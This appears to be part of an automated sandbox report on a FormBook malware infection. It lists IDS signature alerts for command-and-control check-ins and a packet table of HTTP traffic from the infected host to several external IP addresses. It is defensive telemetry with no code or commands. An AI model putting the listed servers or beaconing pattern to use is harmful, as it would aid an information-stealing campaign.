2025-01-07T12:24:27.026424+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50018	134.122.135.48	80	TCP
2025-01-07T12:24:27.026424+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50018	134.122.135.48	80	TCP
2025-01-07T12:24:33.732656+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	172.67.148.216	80	TCP
2025-01-07T12:24:36.281477+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	172.67.148.216	80	TCP
2025-01-07T12:24:38.967109+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	172.67.148.216	80	TCP
2025-01-07T12:24:41.322036+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50022	172.67.148.216	80	TCP
2025-01-07T12:24:41.322036+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50022	172.67.148.216	80	TCP
2025-01-07T12:24:47.935765+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50023	47.83.1.90	80	TCP
2025-01-07T12:24:50.482601+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	47.83.1.90	80	TCP
2025-01-07T12:24:53.032006+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	47.83.1.90	80	TCP
2025-01-07T12:24:58.680190+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50026	47.83.1.90	80	TCP
2025-01-07T12:24:58.680190+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50026	47.83.1.90	80	TCP
2025-01-07T12:25:04.371432+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	199.192.21.169	80	TCP
2025-01-07T12:25:06.991338+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	199.192.21.169	80	TCP
2025-01-07T12:25:09.669230+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	199.192.21.169	80	TCP
2025-01-07T12:25:12.174421+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50030	199.192.21.169	80	TCP
2025-01-07T12:25:12.174421+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50030	199.192.21.169	80	TCP
2025-01-07T12:25:25.847650+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	188.114.97.3	80	TCP
2025-01-07T12:25:28.403224+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	188.114.97.3	80	TCP
2025-01-07T12:25:30.937320+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	188.114.97.3	80	TCP
2025-01-07T12:25:33.507440+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50034	188.114.97.3	80	TCP
2025-01-07T12:25:33.507440+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50034	188.114.97.3	80	TCP
2025-01-07T12:25:40.060493+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50035	47.83.1.90	80	TCP
2025-01-07T12:25:42.607364+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	47.83.1.90	80	TCP
2025-01-07T12:25:45.155337+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	47.83.1.90	80	TCP
2025-01-07T12:25:47.802562+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50038	47.83.1.90	80	TCP
2025-01-07T12:25:47.802562+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50038	47.83.1.90	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 12:22:34.095558882 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.100404978 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.100461006 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.108539104 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.113461971 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.557862997 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.557879925 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.557888031 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.557897091 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.557905912 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.557936907 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.558031082 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.558106899 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.558120966 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.558130026 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.558139086 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.558149099 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.558155060 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.558156967 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:34.558171988 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.558195114 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.562216043 CET	49736	80	192.168.2.4	84.32.84.32
Jan 7, 2025 12:22:34.566982985 CET	80	49736	84.32.84.32	192.168.2.4
Jan 7, 2025 12:22:57.766494989 CET	49764	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:22:57.771336079 CET	80	49764	188.114.97.3	192.168.2.4
Jan 7, 2025 12:22:57.771399975 CET	49764	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:22:57.783463001 CET	49764	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:22:57.788309097 CET	80	49764	188.114.97.3	192.168.2.4
Jan 7, 2025 12:22:59.295922041 CET	49764	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:22:59.301032066 CET	80	49764	188.114.97.3	192.168.2.4
Jan 7, 2025 12:22:59.302967072 CET	49764	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:00.314133883 CET	49785	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:00.318901062 CET	80	49785	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:00.318970919 CET	49785	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:00.332679987 CET	49785	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:00.337505102 CET	80	49785	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:01.842612028 CET	49785	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:01.847562075 CET	80	49785	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:01.847609043 CET	49785	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:02.860738993 CET	49801	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:02.865617037 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.865701914 CET	49801	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:02.877635002 CET	49801	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:02.882514000 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882522106 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882567883 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882575989 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882584095 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882591009 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882599115 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882620096 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:02.882628918 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:04.389822006 CET	49801	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:04.394879103 CET	80	49801	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:04.394937992 CET	49801	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:05.411776066 CET	49817	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:05.416652918 CET	80	49817	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:05.416718960 CET	49817	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:05.429824114 CET	49817	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:05.434674025 CET	80	49817	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:44.920182943 CET	80	49817	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:44.920878887 CET	80	49817	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:44.920953035 CET	49817	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:44.923178911 CET	49817	80	192.168.2.4	188.114.97.3
Jan 7, 2025 12:23:44.927890062 CET	80	49817	188.114.97.3	192.168.2.4
Jan 7, 2025 12:23:50.288788080 CET	50007	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:50.294159889 CET	80	50007	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:50.294223070 CET	50007	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:50.316400051 CET	50007	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:50.321165085 CET	80	50007	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:50.753222942 CET	80	50007	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:50.753240108 CET	80	50007	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:50.753249884 CET	80	50007	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:50.755834103 CET	50007	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:51.826658010 CET	50007	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:52.847096920 CET	50008	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:52.851967096 CET	80	50008	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:52.856451988 CET	50008	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:52.876230955 CET	50008	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:52.881032944 CET	80	50008	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:53.313821077 CET	80	50008	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:53.313838959 CET	80	50008	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:53.313880920 CET	80	50008	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:53.313916922 CET	50008	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:53.314244986 CET	50008	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:54.373523951 CET	50008	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:55.392328024 CET	50009	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:55.397181034 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.397300959 CET	50009	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:55.411984921 CET	50009	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:55.416861057 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.416884899 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.416901112 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.416909933 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.416918039 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.417022943 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.417032003 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.417062044 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.417071104 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.881503105 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.881531954 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.881571054 CET	50009	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:55.881612062 CET	80	50009	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:55.881652117 CET	50009	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:56.920483112 CET	50009	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:57.938945055 CET	50010	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:57.943825960 CET	80	50010	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:57.943886042 CET	50010	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:57.953114033 CET	50010	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:57.957843065 CET	80	50010	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:58.398647070 CET	80	50010	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:58.398664951 CET	80	50010	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:58.398680925 CET	80	50010	199.59.243.228	192.168.2.4
Jan 7, 2025 12:23:58.398808956 CET	50010	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:58.401885033 CET	50010	80	192.168.2.4	199.59.243.228
Jan 7, 2025 12:23:58.406697989 CET	80	50010	199.59.243.228	192.168.2.4
Jan 7, 2025 12:24:04.270045996 CET	50011	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:04.275456905 CET	80	50011	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:04.275520086 CET	50011	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:04.302551031 CET	50011	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:04.307965994 CET	80	50011	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:05.163647890 CET	80	50011	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:05.163749933 CET	80	50011	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:05.167520046 CET	50011	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:05.810978889 CET	50011	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:06.829273939 CET	50012	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:06.834137917 CET	80	50012	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:06.834285975 CET	50012	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:06.846410036 CET	50012	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:06.851165056 CET	80	50012	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:07.878530979 CET	80	50012	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:07.878560066 CET	80	50012	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:07.878567934 CET	80	50012	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:07.878618956 CET	50012	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:08.360310078 CET	50012	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:09.380251884 CET	50013	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:09.385083914 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.392246962 CET	50013	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:09.398406029 CET	50013	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:09.403995037 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404004097 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404011965 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404019117 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404025078 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404032946 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404087067 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404094934 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:09.404102087 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:10.265273094 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:10.265367985 CET	80	50013	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:10.265405893 CET	50013	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:10.906244993 CET	50013	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:11.923865080 CET	50014	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:11.928693056 CET	80	50014	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:11.928756952 CET	50014	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:11.936641932 CET	50014	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:11.941426992 CET	80	50014	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:12.813553095 CET	80	50014	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:12.813641071 CET	80	50014	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:12.814573050 CET	50014	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:12.818275928 CET	50014	80	192.168.2.4	162.251.95.62
Jan 7, 2025 12:24:12.823013067 CET	80	50014	162.251.95.62	192.168.2.4
Jan 7, 2025 12:24:18.503987074 CET	50015	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:18.508791924 CET	80	50015	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:18.508851051 CET	50015	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:18.523962975 CET	50015	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:18.528721094 CET	80	50015	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:19.393573999 CET	80	50015	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:19.393589973 CET	80	50015	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:19.394125938 CET	50015	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:20.029627085 CET	50015	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:21.050226927 CET	50016	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:21.055139065 CET	80	50016	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:21.058342934 CET	50016	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:21.070374012 CET	50016	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:21.075165033 CET	80	50016	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:21.946820974 CET	80	50016	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:21.946996927 CET	80	50016	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:21.947040081 CET	50016	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:22.576458931 CET	50016	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:23.596184015 CET	50017	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:23.601059914 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.601202011 CET	50017	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:23.619436979 CET	50017	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:23.624260902 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624286890 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624301910 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624310970 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624319077 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624428034 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624435902 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624444008 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:23.624463081 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:24.468095064 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:24.468130112 CET	80	50017	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:24.468178988 CET	50017	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:25.123501062 CET	50017	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:26.142173052 CET	50018	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:26.146984100 CET	80	50018	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:26.147047043 CET	50018	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:26.157069921 CET	50018	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:26.161825895 CET	80	50018	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:27.024055004 CET	80	50018	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:27.024122953 CET	80	50018	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:27.026423931 CET	50018	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:27.030158043 CET	50018	80	192.168.2.4	134.122.135.48
Jan 7, 2025 12:24:27.034902096 CET	80	50018	134.122.135.48	192.168.2.4
Jan 7, 2025 12:24:32.081904888 CET	50019	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:32.086745024 CET	80	50019	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:32.086801052 CET	50019	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:32.216649055 CET	50019	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:32.221426010 CET	80	50019	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:33.732656002 CET	50019	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:33.739187956 CET	80	50019	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:33.739231110 CET	50019	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:34.796653032 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:34.801518917 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:34.802175999 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:34.907140970 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:34.911948919 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281416893 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281435013 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281446934 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281476974 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:36.281478882 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281491995 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281502008 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281512976 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281523943 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281526089 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:36.281533957 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281547070 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.281560898 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:36.281584024 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:36.282264948 CET	80	50020	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:36.282308102 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:36.420200109 CET	50020	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:37.440085888 CET	50021	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:37.444979906 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.448174000 CET	50021	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:37.462930918 CET	50021	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:37.468924046 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469026089 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469034910 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469042063 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469049931 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469166040 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469175100 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469183922 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:37.469192028 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:38.967108965 CET	50021	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:38.972563028 CET	80	50021	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:38.976181030 CET	50021	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:39.987194061 CET	50022	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:39.992049932 CET	80	50022	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:39.992109060 CET	50022	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:40.003541946 CET	50022	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:40.008517027 CET	80	50022	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:41.321331024 CET	80	50022	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:41.321980953 CET	80	50022	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:41.322036028 CET	50022	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:41.324537992 CET	50022	80	192.168.2.4	172.67.148.216
Jan 7, 2025 12:24:41.329282999 CET	80	50022	172.67.148.216	192.168.2.4
Jan 7, 2025 12:24:46.378679037 CET	50023	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:46.383447886 CET	80	50023	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:46.383503914 CET	50023	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:46.424177885 CET	50023	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:46.429049015 CET	80	50023	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:47.935765028 CET	50023	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:47.940834999 CET	80	50023	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:47.940880060 CET	50023	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:48.954435110 CET	50024	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:48.959333897 CET	80	50024	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:48.959456921 CET	50024	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:48.973989010 CET	50024	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:48.978796959 CET	80	50024	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:50.482600927 CET	50024	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:50.487658978 CET	80	50024	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:50.487720966 CET	50024	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:51.504017115 CET	50025	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:51.508892059 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.512098074 CET	50025	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:51.527436972 CET	50025	80	192.168.2.4	47.83.1.90
Jan 7, 2025 12:24:51.532340050 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532393932 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532426119 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532442093 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532454014 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532624006 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532644987 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532670021 CET	80	50025	47.83.1.90	192.168.2.4
Jan 7, 2025 12:24:51.532680035 CET	80	50025	47.83.1.90	192.168.2.4
